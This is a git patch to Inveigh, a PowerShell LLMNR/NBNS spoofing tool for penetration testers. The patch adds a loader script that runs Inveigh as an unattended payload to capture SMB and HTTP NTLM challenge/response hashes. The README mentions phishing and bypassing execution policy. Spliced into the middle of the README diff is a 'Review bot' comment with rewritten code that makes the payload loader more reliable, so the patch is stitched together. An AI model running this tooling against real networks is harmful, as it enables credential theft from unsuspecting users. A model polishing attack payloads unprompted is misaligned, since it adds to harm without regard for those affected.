From b7e2bb76537dd8c31feecbf817095a361914e55f Mon Sep 17 00:00:00 2001
From: Kevin Robertson
Date: Wed, 5 Aug 2015 22:39:33 -0400
Subject: Added parameter for controlling output directory. Added first version of loader script for easier execution as a payload. Added '-OutputDir' parameter for controlling the output directory. Added 'Inveigh-Loader.ps1' script which has additional options for running Inveigh as an unattended payload. Performed some cleanup. Updated screenshot in readme.
---
 Inveigh-Loader.ps1 | 77 +++++++++++++++++++++++++++++++++++++++++++++++++++++
 Inveigh.ps1 | Bin 71870 -> 73010 bytes
 README.md | 10 +++---
 3 files changed, 82 insertions(+), 5 deletions(-)
 create mode 100644 Inveigh-Loader.ps1
diff --git a/Inveigh-Loader.ps1 b/Inveigh-Loader.ps1
new file mode 100644
index 0000000..5e4f4ac
--- /dev/null
+++ b/Inveigh-Loader.ps1
@@ -0,0 +1,77 @@
+<#
+.SYNOPSIS
+Inveigh Loader provides additional options for running Inveigh as an unattended payload.
+
+.DESCRIPTION
+Inveigh Loader can load Inveigh with set parameters and stop execution after specified amount of time. Inveigh can be either loaded as a separate script or through a scriptblock embedded within this script. If the scriptblock method is selected, the current Inveigh.ps1 code must be copied into the $inveigh_scriptblock below. This is a basic version, additional features will be added.
+#>
+
+# Inveigh loader parameters
+$run_length = 1 # Set the number of minutes Inveigh will run
+$start_job_method = "filepath" # Set the Job-Start method. filepath,scriptblock
+
+# Inveigh parameters - refer to Inveigh.ps1 for details
+$IP = ""
+$SpooferIP = ""
+$HTTP = "Y"
+$HTTPS = "N"
+$SMB = "Y"
+$LLMNR = "Y"
+$NBNS = "N"
+$NBNSTypes = @("20") # Format for multiples = @("00","20")
+$Repeat = "Y"
+$ForceWPADAuth = "Y"
+$Output = "0"
+$OutputDir = ""
+
+if(-not($IP))
+{
+ $IP = (Test-Connection 127.0.0.1 -count 1 | select -ExpandProperty Ipv4Address)
+}
+
+if(-not($SpooferIP))
+{
+ $SpooferIP = $IP
+}
+
+if(-not($OutputDir))
+{
+ $OutputDir = $PWD.Path
+}
+
+$inveigh_scriptblock =
+{ # begin $inveigh_scriptblock - paste Inveigh.ps1 code below this line if using $start_job_method = "scriptblock"
+
+} # end $inveigh_scriptblock
+
+try
+{
+ if ($start_job_method -eq "filepath")
+ {
+ Start-Job -Name Inveigh -FilePath .\Inveigh.ps1 -ArgumentList $IP,$SpooferIP,$HTTP,$HTTPS,$SMB,$LLMNR,$NBNS,$NBNSTypes,$Repeat,$ForceWPADAuth,$Output,$OutputDir | Out-Null
+ }
+ elseif ($start_job_method -eq "scriptblock")
+ {
+ Start-Job -Name Inveigh -ScriptBlock $inveigh_scriptblock -ArgumentList $IP,$SpooferIP,$HTTP,$HTTPS,$SMB,$LLMNR,$NBNS,$NBNSTypes,$Repeat,$ForceWPADAuth,$Output,$OutputDir | Out-Null
+ }
+ else
+ {
+ throw "Invalid $start_job_method."
+ }
+
+ $run_timeout = new-timespan -Minutes $run_length
+ $run_stopwatch = [diagnostics.stopwatch]::StartNew()
+
+ while ($run_stopwatch.elapsed -lt $run_timeout)
+ {
+ Receive-Job -name Inveigh
+ }
+
+}
+finally
+{
+ Stop-Job -name Inveigh
+ Receive-Job -name Inveigh
+ Remove-Job -name Inveigh
+ write-warning "Inveigh Loader exited at $(Get-Date -format 's')"
+}
diff --git a/Inveigh.ps1 b/Inveigh.ps1
index 6bbb375..436d505 100644
Binary files a/Inveigh.ps1 and b/Inveigh.ps1 differ
diff --git a/README.md b/README.md
index c015622..2255b06 100644
--- a/README.md
+++ b/README.md
@@ -2,10 +2,10 @@ Inveigh is a Windows PowerShell LLMNR/NBNS spoofer designed to assist penetration testers that find themselves limited to a Windows system. This can commonly occur while performing phishing attacks, USB drive attacks, VLAN pivoting, or simply being restricted to a Windows system as part of client imposed restrictions. # Requirements -Tested with PowerShell 2.0 and .NET 3.5. +Tested minimums are PowerShell 2.0 and .NET 3.5. # Notes -1. Currently supports IPv4 LLMNR/NBNS spoofing and HTTP/SMB NTLMv1/NTLMv2 challenge/response capture. +1. Currently supports IPv4 LLMNR/NBNS spoofing and HTTP/HTTPS/SMB NTLMv1/NTLMv2 challenge/response capture. 2. LLMNR/NBNS spoofing is performed through sniffing and sending with raw sockets. 3. SMB challenge/response captures are performed by sniffing over the host system's SMB service. 4. HTTP challenge/response captures are performed with a dedicated listener.
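Review bot: The `finally` block at the end of the hunk calls `Stop-Job`/`Receive-Job`/`Remove-Job -name Inveigh` even on the path where no job was ever started (the `else` branch throws before `Start-Job` runs), so the cleanup itself errors, and matching by `-Name` would also sweep up a stale `Inveigh` job left over from an earlier interrupted run. Keeping the object returned by `Start-Job` in a variable and guarding the cleanup on it avoids both. The `while` loop just above calls `Receive-Job` back-to-back with no delay, which spins a CPU core for the full `$run_length` and keeps polling even after the job has already failed (for instance because `.\Inveigh.ps1` is resolved against the caller's current directory rather than the loader's own location); a short `Start-Sleep` and a job-state check make the loop cheap and let it end early. The rewrite below stays PowerShell 2.0-compatible, matching the minimum the README states.
```powershell
$inveigh_job = $null

try
{
    if ($start_job_method -eq "filepath")
    {
        $inveigh_job = Start-Job -Name Inveigh -FilePath .\Inveigh.ps1 -ArgumentList $IP,$SpooferIP,$HTTP,$HTTPS,$SMB,$LLMNR,$NBNS,$NBNSTypes,$Repeat,$ForceWPADAuth,$Output,$OutputDir
    }
    # … unchanged: scriptblock branch (assigning $inveigh_job the same way) and the else/throw …

    $run_timeout = new-timespan -Minutes $run_length
    $run_stopwatch = [diagnostics.stopwatch]::StartNew()

    # Poll at a low rate; stop early once the job has finished or failed on its own
    while ($run_stopwatch.elapsed -lt $run_timeout -and $inveigh_job.State -ne "Completed" -and $inveigh_job.State -ne "Failed")
    {
        Receive-Job -Job $inveigh_job
        Start-Sleep -Seconds 1
    }
}
finally
{
    # Only clean up a job this script actually created
    if ($inveigh_job)
    {
        Stop-Job -Job $inveigh_job
        Receive-Job -Job $inveigh_job
        Remove-Job -Job $inveigh_job
    }
    write-warning "Inveigh Loader exited at $(Get-Date -format 's')"
}
```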
@@ -17,13 +17,13 @@ Tested with PowerShell 2.0 and .NET 3.5. 10. If you copy/paste challenge/response captures from output window for password cracking, remove carriage returns. # Usage -Obtain an elevated administrator or SYSTEM shell. If necessary, use a method to bypass script execution policy. +Obtain an elevated administrator or SYSTEM shell. If necessary, use a method to bypass the PowerShell script execution policy. To execute with default settings: Inveigh.ps1 To execute with features enabled/disabled: -Inveigh.ps1 -i localip -LLMNR Y/N -NBNS Y/N -NBNSTypes 00,03,20,1B -HTTP Y/N -HTTPS Y/N -SMB Y/N -Repeat Y/N -ForceWPADAuth Y/N -Output 0,1,2 +Inveigh.ps1 -IP 'local IP' -SpoofIP 'local or remote IP' -LLMNR Y/N -NBNS Y/N -NBNSTypes 00,03,20,1B -HTTP Y/N -HTTPS Y/N -SMB Y/N -Repeat Y/N -ForceWPADAuth Y/N -Output 0,1,2 -OutputDir 'valid folder path' # Screenshot -![Inveigh](https://cloud.githubusercontent.com/assets/5897462/7216149/c49679ce-e5c2-11e4-9825-2abacc56e91f.PNG) +![inveigh-screenshot2](https://cloud.githubusercontent.com/assets/5897462/9102520/62f199c4-3bc1-11e5-87a7-08837950a04f.PNG) -- cgit v1.2.3